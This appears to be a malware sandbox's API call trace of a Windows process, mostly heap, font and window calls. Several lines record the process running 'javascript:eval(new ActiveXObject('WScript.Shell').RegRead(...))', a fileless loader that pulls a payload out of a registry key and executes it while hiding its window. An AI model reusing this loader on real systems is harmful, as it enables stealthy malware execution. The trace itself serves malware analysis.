HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.464] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.464] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.464] IUnknown:Release (This=0x63c68c) returned 0x8 [0075.464] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.464] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.464] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.465] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.465] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.465] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.465] IUnknown:Release (This=0x63c68c) returned 0x7 [0075.465] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.465] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.465] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x651070 | out: hHeap=0x610000) returned 1 [0075.465] IUnknown:Release (This=0x63c68c) returned 0x6 [0075.465] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.465] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.465] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.465] IUnknown:Release (This=0x63c68c) returned 0x5 [0075.465] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x650590 | out: hHeap=0x610000) returned 1 [0075.465] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6502d8 | out: hHeap=0x610000) returned 1 [0075.465] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 
[0075.465] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x650410 | out: hHeap=0x610000) returned 1 [0075.465] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.465] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.465] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.465] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.466] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x63f290 | out: hHeap=0x610000) returned 1 [0075.466] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.466] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.466] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x650480 | out: hHeap=0x610000) returned 1 [0075.466] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x651018 | out: hHeap=0x610000) returned 1 [0075.466] GetCurrentThreadId () returned 0x2a8 [0075.466] GetCurrentThreadId () returned 0x2a8 [0075.466] GetCurrentThreadId () returned 0x2a8 [0075.466] GetCurrentThreadId () returned 0x2a8 [0075.466] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0xc) returned 0x63f290 [0075.466] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x64) returned 0x6875f0 [0075.590] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0xec) returned 0x67b670 [0075.590] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.590] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.592] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xdc) returned 0x67b768 [0075.592] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x30) returned 0x62d830 [0075.593] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x250) returned 0x68d9d8 [0075.593] LsGetRubyLsimethods () returned 0x0 [0075.593] 
LsGetTatenakayokoLsimethods () returned 0x0 [0075.593] LsGetHihLsimethods () returned 0x0 [0075.593] LsGetWarichuLsimethods () returned 0x0 [0075.593] LsGetReverseLsimethods () returned 0x0 [0075.593] LsCreateContext () returned 0x0 [0075.593] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x670) returned 0x677338 [0075.593] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x24) returned 0x650a90 [0075.593] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x110) returned 0x6650a0 [0075.593] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x24) returned 0x682b98 [0075.593] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x2e4) returned 0x68d2f8 [0075.593] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x20) returned 0x63a868 [0075.594] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x20) returned 0x685968 [0075.594] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0xa0) returned 0x679bc8 [0075.594] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x40) returned 0x65eb70 [0075.594] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x20) returned 0x685a30 [0075.594] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x20) returned 0x6859e0 [0075.594] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x20) returned 0x685918 [0075.594] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x20) returned 0x685a80 [0075.594] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x400) returned 0x67d058 [0075.594] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x8) returned 0x65cb18 [0075.594] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x8) returned 0x65ca58 [0075.594] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x8) returned 0x65ca48 [0075.594] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x8) returned 0x65ca68 [0075.594] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x128) returned 0x68d5e8 [0075.594] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x11c) 
returned 0x650270 [0075.594] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x108) returned 0x68dc30 [0075.594] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x130) returned 0x650398 [0075.595] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x110) returned 0x6651b8 [0075.595] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x278) returned 0x651fc0 [0075.595] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0xc8) returned 0x67b850 [0075.595] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x190) returned 0x6504d0 [0075.595] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x78) returned 0x622e00 [0075.595] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0xf0) returned 0x652240 [0075.595] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x4c) returned 0x651018 [0075.595] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x194) returned 0x652338 [0075.595] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0xc8) returned 0x650668 [0075.595] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x190) returned 0x67a4f0 [0075.595] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x108) returned 0x67a688 [0075.595] LsSetModWidthPairs () returned 0x0 [0075.595] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x240) returned 0x67a798 [0075.595] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x18) returned 0x66bec0 [0075.595] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x20) returned 0x685ad0 [0075.596] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x10) returned 0x6870c0 [0075.596] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x2e0) returned 0x679dd8 [0075.596] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x24) returned 0x682c88 [0075.597] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0xc0) returned 0x67a0c0 [0075.597] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0xc0) returned 0x67a188 [0075.597] LsSetBreaking () returned 0x0 [0075.598] 
RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x271) returned 0x652528 [0075.598] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0xa) returned 0x686fb8 [0075.598] LsSetDoc () returned 0x0 [0075.598] IBindStatusCallback:OnLowResource (This=0x65cb18, reserved=0x6774e4) returned 0x0 [0075.598] IBindStatusCallback:OnLowResource (This=0x65ca58, reserved=0x6774e4) returned 0x0 [0075.598] IBindStatusCallback:OnLowResource (This=0x65ca48, reserved=0x6774e4) returned 0x0 [0075.598] IBindStatusCallback:OnLowResource (This=0x65ca68, reserved=0x6774e4) returned 0x0 [0075.598] LsCreateLine () returned 0x0 [0075.598] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.598] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xb4) returned 0x694000 [0075.598] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xb4) returned 0x6940c0 [0075.598] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xf8) returned 0x67a250 [0075.598] EnumFontsW (hdc=0x3010a0f, lpLogfont="Times New Roman", lpProc=0x74c40b47, lParam=0x18e6e4) returned 1 [0075.600] CreateFontIndirectW (lplf=0x18e680) returned 0x170a08ae [0075.600] SelectObject (hdc=0x3010a0f, h=0x170a08ae) returned 0x18a002e [0075.600] GetTextMetricsW (in: hdc=0x3010a0f, lptm=0x18e5e8 | out: lptm=0x18e5e8) returned 1 [0075.604] GetOutlineTextMetricsW (in: hdc=0x3010a0f, cjCopy=0xd8, potm=0x18e4e8 | out: potm=0x18e4e8) returned 0xd8 [0075.605] SelectObject (hdc=0x3010a0f, h=0x18a002e) returned 0x170a08ae [0075.605] SelectObject (hdc=0x3010a0f, h=0x170a08ae) returned 0x18a002e [0075.605] GetTextFaceW (in: hdc=0x3010a0f, c=32, lpName=0x18e738 | out: lpName="Times New Roman") returned 16 [0075.605] SelectObject (hdc=0x3010a0f, h=0x18a002e) returned 0x170a08ae [0075.605] SelectObject (hdc=0x3010a0f, h=0x170a08ae) returned 0x18a002e [0075.605] GetTextCharsetInfo (in: hdc=0x3010a0f, lpSig=0x18e6a0, dwFlags=0x0 | out: lpSig=0x18e6a0) returned 0 [0075.605] SelectObject (hdc=0x3010a0f, 
h=0x18a002e) returned 0x170a08ae [0075.605] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xc) returned 0x686f88 [0075.605] SelectObject (hdc=0x3010a0f, h=0x170a08ae) returned 0x18a002e [0075.605] GetFontUnicodeRanges (in: hdc=0x3010a0f, lpgs=0x0 | out: lpgs=0x0) returned 0x27c [0075.605] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.605] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x27c) returned 0x649c88 [0075.605] GetFontUnicodeRanges (in: hdc=0x3010a0f, lpgs=0x649c88 | out: lpgs=0x649c88) returned 0x27c [0075.605] SelectObject (hdc=0x3010a0f, h=0x18a002e) returned 0x170a08ae [0075.605] SelectObject (hdc=0x3010a0f, h=0x170a08ae) returned 0x18a002e [0075.605] GetCharWidth32W (in: hdc=0x3010a0f, iFirst=0x20, iLast=0x7e, lpBuffer=0x18e678 | out: lpBuffer=0x18e678) returned 1 [0075.608] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x17c) returned 0x692000 [0075.608] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x800) returned 0x649f10 [0075.608] SelectObject (hdc=0x3010a0f, h=0x18a002e) returned 0x170a08ae [0075.609] LsQueryLineDup () returned 0x0 [0075.609] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xb4) returned 0x694180 [0075.609] LsDestroyLine () returned 0x0 [0075.609] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.609] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x60) returned 0x65d208 [0075.609] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x40) returned 0x65ebb8 [0075.610] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x679dd8 | out: hHeap=0x610000) returned 1 [0075.610] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.610] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.610] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.610] HeapFree (in: hHeap=0x610000, 
dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.610] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.610] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.610] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.610] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.610] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.610] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.610] IntersectRect (in: lprcDst=0x18f444, lprcSrc1=0x18f444, lprcSrc2=0x18f414 | out: lprcDst=0x18f444) returned 1 [0075.610] IntersectRect (in: lprcDst=0x656950, lprcSrc1=0x656950, lprcSrc2=0x18f434 | out: lprcDst=0x656950) returned 1 [0075.610] IntersectRect (in: lprcDst=0x656950, lprcSrc1=0x656950, lprcSrc2=0x18f454 | out: lprcDst=0x656950) returned 1 [0075.610] IntersectRect (in: lprcDst=0x18f104, lprcSrc1=0x18f104, lprcSrc2=0x18f0d4 | out: lprcDst=0x18f104) returned 1 [0075.610] IntersectRect (in: lprcDst=0x656950, lprcSrc1=0x656950, lprcSrc2=0x18f0f4 | out: lprcDst=0x656950) returned 1 [0075.610] IntersectRect (in: lprcDst=0x656950, lprcSrc1=0x656950, lprcSrc2=0x18f114 | out: lprcDst=0x656950) returned 1 [0075.610] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.611] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.611] IntersectRect (in: lprcDst=0x18f018, lprcSrc1=0x18f018, lprcSrc2=0x656940 | out: lprcDst=0x18f018) returned 1 [0075.611] UnionRect (in: lprcDst=0x18f320, lprcSrc1=0x18f320, lprcSrc2=0x18f2cc | out: lprcDst=0x18f320) returned 1 [0075.611] IntersectRect (in: lprcDst=0x18f2b8, lprcSrc1=0x18f2b8, lprcSrc2=0x18f250 | out: lprcDst=0x18f2b8) returned 1 [0075.611] IntersectRect (in: lprcDst=0x18f1c8, lprcSrc1=0x18f1c8, 
lprcSrc2=0x18f250 | out: lprcDst=0x18f1c8) returned 1 [0075.611] IntersectRect (in: lprcDst=0x18f260, lprcSrc1=0x18f260, lprcSrc2=0x18f1c8 | out: lprcDst=0x18f260) returned 1 [0075.611] IntersectRect (in: lprcDst=0x18f2b8, lprcSrc1=0x18f2b8, lprcSrc2=0x18f250 | out: lprcDst=0x18f2b8) returned 1 [0075.611] IntersectRect (in: lprcDst=0x18f2b8, lprcSrc1=0x18f2b8, lprcSrc2=0x18f250 | out: lprcDst=0x18f2b8) returned 1 [0075.611] IntersectRect (in: lprcDst=0x18f1c8, lprcSrc1=0x18f1c8, lprcSrc2=0x18f250 | out: lprcDst=0x18f1c8) returned 1 [0075.611] IntersectRect (in: lprcDst=0x18f260, lprcSrc1=0x18f260, lprcSrc2=0x18f1c8 | out: lprcDst=0x18f260) returned 1 [0075.611] IntersectRect (in: lprcDst=0x18f2b8, lprcSrc1=0x18f2b8, lprcSrc2=0x18f250 | out: lprcDst=0x18f2b8) returned 1 [0075.611] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.611] UnionRect (in: lprcDst=0x18f660, lprcSrc1=0x18f660, lprcSrc2=0x18f60c | out: lprcDst=0x18f660) returned 1 [0075.611] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x28) returned 0x682a18 [0075.611] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x682a18 | out: hHeap=0x610000) returned 1 [0075.611] RedrawWindow (hWnd=0x0, lprcUpdate=0x18f6e0, hrgnUpdate=0x0, flags=0x21) returned 1 [0075.612] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x8) returned 0x65ca78 [0075.612] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x4) returned 0x65cb08 [0075.612] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f388 | out: lpPoint=0x18f388) returned 0 [0075.612] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x28) returned 0x682a18 [0075.612] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x30) returned 0x62d868 [0075.612] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x28) returned 0x682bf8 [0075.613] GetCurrentThreadId () returned 0x2a8 [0075.613] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x62d868 | out: hHeap=0x610000) returned 1 [0075.613] GetCurrentThreadId 
() returned 0x2a8 [0075.613] GetCurrentThreadId () returned 0x2a8 [0075.613] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f388 | out: lpPoint=0x18f388) returned 0 [0075.613] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x30) returned 0x62d868 [0075.613] GetCurrentThreadId () returned 0x2a8 [0075.613] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x62d868 | out: hHeap=0x610000) returned 1 [0075.614] GetCurrentThreadId () returned 0x2a8 [0075.614] GetCurrentThreadId () returned 0x2a8 [0075.614] RtlReAllocateHeap (Heap=0x610000, Flags=0x0, Ptr=0x659fb0, Size=0x6c) returned 0x67d6a0 [0075.614] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f388 | out: lpPoint=0x18f388) returned 0 [0075.614] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x30) returned 0x62d868 [0075.615] GetCurrentThreadId () returned 0x2a8 [0075.615] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x62d868 | out: hHeap=0x610000) returned 1 [0075.615] GetCurrentThreadId () returned 0x2a8 [0075.615] GetCurrentThreadId () returned 0x2a8 [0075.615] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f388 | out: lpPoint=0x18f388) returned 0 [0075.615] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x30) returned 0x62d868 [0075.615] GetCurrentThreadId () returned 0x2a8 [0075.615] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x62d868 | out: hHeap=0x610000) returned 1 [0075.615] GetCurrentThreadId () returned 0x2a8 [0075.615] GetCurrentThreadId () returned 0x2a8 [0075.616] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f388 | out: lpPoint=0x18f388) returned 0 [0075.616] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x30) returned 0x62d868 [0075.616] GetCurrentThreadId () returned 0x2a8 [0075.616] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x62d868 | out: hHeap=0x610000) returned 1 [0075.616] GetCurrentThreadId () returned 0x2a8 [0075.616] GetCurrentThreadId () returned 0x2a8 [0075.616] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x682bf8 | out: hHeap=0x610000) returned 1 [0075.616] 
HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x65ca78 | out: hHeap=0x610000) returned 1 [0075.616] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x682a18 | out: hHeap=0x610000) returned 1 [0075.616] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x65cb08 | out: hHeap=0x610000) returned 1 [0075.616] GetCurrentThreadId () returned 0x2a8 [0075.617] GetFocus () returned 0x0 [0075.617] ParseURLW (in: pcszURL="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();", ppu=0x18f6d8 | out: ppu=0x18f6d8) returned 0x0 [0075.734] IUnknown:AddRef (This=0x63be1c) returned 0x4 [0075.734] IUri:GetAbsoluteUri (in: This=0x63be1c, pbstrAbsoluteUri=0x18f758 | out: pbstrAbsoluteUri=0x18f758*="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();") returned 0x0 [0075.735] IUnknown:Release (This=0x63be1c) returned 0x3 [0075.935] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f550 | out: lpPoint=0x18f550) returned 0 [0075.935] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x30) returned 0x62d868 [0075.936] GetCurrentThreadId () returned 0x2a8 [0075.936] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x62d868 | out: hHeap=0x610000) returned 1 [0075.936] GetCurrentThreadId () returned 0x2a8 [0075.936] GetCurrentThreadId () returned 0x2a8 [0075.936] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76e40000 [0075.937] GetProcAddress (hModule=0x76e40000, lpProcName="VariantClear") returned 0x76e43eae [0075.937] LoadStringW (in: hInstance=0x73710000, uID=0x1fe9, lpBuffer=0x18f348, cchBufferMax=512 | out: lpBuffer="Done") returned 0x4 [0075.937] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.937] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.937] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0xe) returned 0x6870a8 [0076.415] ParseURLW (in: pcszURL="javascript:eval(new 
ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();", ppu=0x18f260 | out: ppu=0x18f260) returned 0x0 [0076.415] IUnknown:AddRef (This=0x63be1c) returned 0x4 [0076.415] IUri:GetScheme (in: This=0x63be1c, pdwScheme=0x18e7d4 | out: pdwScheme=0x18e7d4*=0xf) returned 0x0 [0076.415] IUri:GetDisplayUri (in: This=0x63be1c, pbstrDisplayString=0x18e7e0 | out: pbstrDisplayString=0x18e7e0*="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();") returned 0x0 [0076.415] GetWindowTextW (in: hWnd=0x40162, lpString=0x18e380, nMaxCount=512 | out: lpString="") returned 0 [0076.415] SetWindowTextW (hWnd=0x40162, lpString="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();") returned 0 [0076.415] IUnknown:Release (This=0x63be1c) returned 0x3 [0076.416] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0076.416] SendMessageW (hWnd=0x50116, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0 [0076.416] NtdllDefWindowProc_W () returned 0x0 [0076.417] NtdllDefWindowProc_W () returned 0x0 [0076.417] NtdllDefWindowProc_W () returned 0x0 [0076.417] SendMessageW (hWnd=0x40162, Msg=0x80, wParam=0x0, lParam=0x10027) returned 0x0 [0076.417] SetWindowLongW (hWnd=0x40162, nIndex=-16, dwNewLong=-2100363264) returned 0 [0076.417] SetWindowLongW (hWnd=0x40162, nIndex=-20, dwNewLong=262144) returned 0 [0076.417] SetWindowPos (hWnd=0x40162, hWndInsertAfter=0xfffffffe, X=0, Y=0, cx=0, cy=0, uFlags=0x37) returned 0 [0076.417] GlobalAddAtomW (lpString=0x0) returned 0x0 [0076.417] SetPropW (hWnd=0x50116, lpString=0x0, hData=0x50116) returned 0 [0076.417] ShowWindow (hWnd=0x40162, nCmdShow=0) returned 0 [0076.418] UpdateWindow (hWnd=0x40162) returned 0 [0076.418] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0076.418] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 
[0076.418] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0076.418] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0076.418] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0076.418] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0076.418] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0076.418] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0076.418] GetCurrentThreadId () returned 0x2a8 [0076.418] GetCurrentThreadId () returned 0x2a8 [0076.418] GetCurrentThreadId () returned 0x2a8 [0076.696] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f0b8 | out: lpPoint=0x18f0b8) returned 0 [0076.696] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x30) returned 0x62d868 [0076.696] GetCurrentThreadId () returned 0x2a8 [0076.696] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x62d868 | out: hHeap=0x610000) returned 1 [0076.696] GetCurrentThreadId () returned 0x2a8 [0076.696] GetFocus () returned 0x0 [0076.697] RtlReAllocateHeap (Heap=0x610000, Flags=0x0, Ptr=0x67d6a0, Size=0x9c) returned 0x67a350 [0076.697] StrCmpICW (pszStr1="about:blank", pszStr2="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();") returned -9 [0076.697] StrCmpICW (pszStr1="about:blank", pszStr2="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();") returned -9 [0077.073] GetCurrentThreadId () returned 0x2a8 [0077.074] GetCurrentThreadId () returned 0x2a8 [0077.074] GetCurrentThreadId () returned 0x2a8 [0077.074] GetCurrentThreadId () returned 0x2a8 [0077.074] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f610 | out: lpPoint=0x18f610) returned 0 [0077.074] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x30) returned 0x62d868 [0077.074] 
GetCurrentThreadId () returned 0x2a8 [0077.074] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x62d868 | out: hHeap=0x610000) returned 1 [0077.074] GetCurrentThreadId () returned 0x2a8 [0077.074] GetCurrentThreadId () returned 0x2a8 [0077.075] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f5d0 | out: lpPoint=0x18f5d0) returned 0 [0077.075] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x30) returned 0x62d868 [0077.075] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x62d868 | out: hHeap=0x610000) returned 1 [0077.075] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f5b0 | out: lpPoint=0x18f5b0) returned 0 [0077.075] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x30) returned 0x62d868 [0077.075] GetCurrentThreadId () returned 0x2a8 [0077.075] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x62d868 | out: hHeap=0x610000) returned 1 [0077.076] GetCurrentThreadId () returned 0x2a8 [0077.076] IsWinEventHookInstalled 